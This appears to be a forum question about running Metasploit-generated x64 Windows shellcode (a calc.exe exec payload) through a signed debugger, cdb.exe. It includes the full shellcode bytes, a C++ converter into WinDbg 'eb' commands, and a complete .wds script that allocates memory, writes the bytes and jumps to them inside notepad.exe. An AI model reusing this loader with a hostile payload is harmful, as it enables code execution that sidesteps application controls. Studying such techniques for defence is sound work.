Question about shellcode
http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
My way:
1. First, use msfpayload to generate the shellcode.
use windows/x64/exec
set cmd calc.exe
generate -t hex
It generates the following shellcode:
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
2. Change the shellcode's format.
I wrote a C++ program to do it.
The code is:
#include "stdafx.h"
#include <ctype.h>
#include <stdio.h>
#include <string.h>
char *buf="fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500";
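/*
 * Print the hex string in `buf` as a sequence of WinDbg/cdb `eb` commands,
 * four bytes per output line, in the layout used by the .wds command file:
 * byte i becomes ";eb @$t0+<i in hex> <two hex digits>". The generated script
 * therefore expects $t0 to already hold the target buffer address.
 *
 * Returns 0 on success, 1 (with a message on stderr) when `buf` is not an
 * even-length string of hex digits — the original silently dropped a
 * trailing odd nibble and passed any non-hex character straight through,
 * producing a script that fails only when it is executed.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    /* strlen() is O(n); evaluate it once rather than on every loop test. */
    size_t hexlen = strlen(buf);
    if (hexlen % 2 != 0) {
        fprintf(stderr, "buf has odd length %lu; a trailing nibble would be dropped\n",
                (unsigned long)hexlen);
        return 1;
    }
    for (size_t k = 0; k < hexlen; k++) {
        /* Cast to unsigned char: <ctype.h> functions take values in 0..UCHAR_MAX or EOF. */
        if (!isxdigit((unsigned char)buf[k])) {
            fprintf(stderr, "buf[%lu] = '%c' is not a hex digit\n",
                    (unsigned long)k, buf[k]);
            return 1;
        }
    }

    size_t nbytes = hexlen / 2;
    for (size_t i = 0; i < nbytes; i++) {
        /* %c, not %C: %C is the wide-character conversion (MSVC/POSIX), which
         * only happened to work here; %c is the standard conversion for a char.
         * The offset is cast to unsigned so %02X matches its argument type. */
        printf(";eb @$t0+%02X %c%c", (unsigned)i, buf[i * 2], buf[i * 2 + 1]);
        /* Line break after every fourth byte, matching the .wds layout. */
        if ((i + 1) % 4 == 0) {
            printf("\n");
        }
    }
    printf("\n");
    return 0;
}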
Here is the output:
3. Modify the file x64_calc.wds:
- Replace the shellcode
- Reset the size of the shellcode buffer
Here is my test.wds:
$$ test.wds: allocate a 276-byte (0x114) buffer with .dvalloc and keep its base in $t0,
$$ fill it one byte at a time with eb, move $ip onto it, resume, then quit.
$$ NOTE(review): the eb offsets run 00..113, i.e. 276 bytes, which matches the .dvalloc
$$ size above. Any change to the byte list must keep the two values in step.
.foreach /pS 5 ( register { .dvalloc 276 } ) { r @$t0 = register }
;eb @$t0+00 fc;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 e4
;eb @$t0+04 f0;eb @$t0+05 e8;eb @$t0+06 c0;eb @$t0+07 00
;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51
;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51
;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 d2
;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8b;eb @$t0+17 52
;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8b;eb @$t0+1B 52
;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8b;eb @$t0+1F 52
;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8b;eb @$t0+23 72
;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0f;eb @$t0+27 b7
;eb @$t0+28 4a;eb @$t0+29 4a;eb @$t0+2A 4d;eb @$t0+2B 31
;eb @$t0+2C c9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F c0
;eb @$t0+30 ac;eb @$t0+31 3c;eb @$t0+32 61;eb @$t0+33 7c
;eb @$t0+34 02;eb @$t0+35 2c;eb @$t0+36 20;eb @$t0+37 41
;eb @$t0+38 c1;eb @$t0+39 c9;eb @$t0+3A 0d;eb @$t0+3B 41
;eb @$t0+3C 01;eb @$t0+3D c1;eb @$t0+3E e2;eb @$t0+3F ed
;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48
;eb @$t0+44 8b;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8b
;eb @$t0+48 42;eb @$t0+49 3c;eb @$t0+4A 48;eb @$t0+4B 01
;eb @$t0+4C d0;eb @$t0+4D 8b;eb @$t0+4E 80;eb @$t0+4F 88
;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48
;eb @$t0+54 85;eb @$t0+55 c0;eb @$t0+56 74;eb @$t0+57 67
;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A d0;eb @$t0+5B 50
;eb @$t0+5C 8b;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44
;eb @$t0+60 8b;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49
;eb @$t0+64 01;eb @$t0+65 d0;eb @$t0+66 e3;eb @$t0+67 56
;eb @$t0+68 48;eb @$t0+69 ff;eb @$t0+6A c9;eb @$t0+6B 41
;eb @$t0+6C 8b;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48
;eb @$t0+70 01;eb @$t0+71 d6;eb @$t0+72 4d;eb @$t0+73 31
;eb @$t0+74 c9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 c0
;eb @$t0+78 ac;eb @$t0+79 41;eb @$t0+7A c1;eb @$t0+7B c9
;eb @$t0+7C 0d;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F c1
;eb @$t0+80 38;eb @$t0+81 e0;eb @$t0+82 75;eb @$t0+83 f1
;eb @$t0+84 4c;eb @$t0+85 03;eb @$t0+86 4c;eb @$t0+87 24
;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B d1
;eb @$t0+8C 75;eb @$t0+8D d8;eb @$t0+8E 58;eb @$t0+8F 44
;eb @$t0+90 8b;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49
;eb @$t0+94 01;eb @$t0+95 d0;eb @$t0+96 66;eb @$t0+97 41
;eb @$t0+98 8b;eb @$t0+99 0c;eb @$t0+9A 48;eb @$t0+9B 44
;eb @$t0+9C 8b;eb @$t0+9D 40;eb @$t0+9E 1c;eb @$t0+9F 49
;eb @$t0+A0 01;eb @$t0+A1 d0;eb @$t0+A2 41;eb @$t0+A3 8b
;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01
;eb @$t0+A8 d0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41
;eb @$t0+AC 58;eb @$t0+AD 5e;eb @$t0+AE 59;eb @$t0+AF 5a
;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59
;eb @$t0+B4 41;eb @$t0+B5 5a;eb @$t0+B6 48;eb @$t0+B7 83
;eb @$t0+B8 ec;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52
;eb @$t0+BC ff;eb @$t0+BD e0;eb @$t0+BE 58;eb @$t0+BF 41
;eb @$t0+C0 59;eb @$t0+C1 5a;eb @$t0+C2 48;eb @$t0+C3 8b
;eb @$t0+C4 12;eb @$t0+C5 e9;eb @$t0+C6 57;eb @$t0+C7 ff
;eb @$t0+C8 ff;eb @$t0+C9 ff;eb @$t0+CA 5d;eb @$t0+CB 48
;eb @$t0+CC ba;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00
;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00
;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8d;eb @$t0+D7 8d
;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00
;eb @$t0+DC 41;eb @$t0+DD ba;eb @$t0+DE 31;eb @$t0+DF 8b
;eb @$t0+E0 6f;eb @$t0+E1 87;eb @$t0+E2 ff;eb @$t0+E3 d5
;eb @$t0+E4 bb;eb @$t0+E5 f0;eb @$t0+E6 b5;eb @$t0+E7 a2
;eb @$t0+E8 56;eb @$t0+E9 41;eb @$t0+EA ba;eb @$t0+EB a6
;eb @$t0+EC 95;eb @$t0+ED bd;eb @$t0+EE 9d;eb @$t0+EF ff
;eb @$t0+F0 d5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 c4
;eb @$t0+F4 28;eb @$t0+F5 3c;eb @$t0+F6 06;eb @$t0+F7 7c
;eb @$t0+F8 0a;eb @$t0+F9 80;eb @$t0+FA fb;eb @$t0+FB e0
;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE bb;eb @$t0+FF 47
;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6f;eb @$t0+103 6a
;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89
;eb @$t0+108 da;eb @$t0+109 ff;eb @$t0+10A d5;eb @$t0+10B 63
;eb @$t0+10C 61;eb @$t0+10D 6c;eb @$t0+10E 63;eb @$t0+10F 2e
;eb @$t0+110 65;eb @$t0+111 78;eb @$t0+112 65;eb @$t0+113 00
$$ Point the instruction pointer at the start of the buffer, resume twice, then exit.
$$ NOTE(review): nothing above checks that .dvalloc succeeded or that $t0 is non-zero
$$ before the eb writes and the $ip change - worth confirming interactively if the script fails.
r @$ip=@$t0
g
g
q
4. Use cdb.exe to run the shellcode.
TestOS:
Win 10 x64
Command:
cdb64.exe -cf test.wds -o notepad.exe
The POC x64_calc.wds works, but my test.wds failed. The output is:
My questions:
1. Should I change the msfpayload shellcode or its format?
2. How do I set a breakpoint on my shellcode?
With cdb.exe?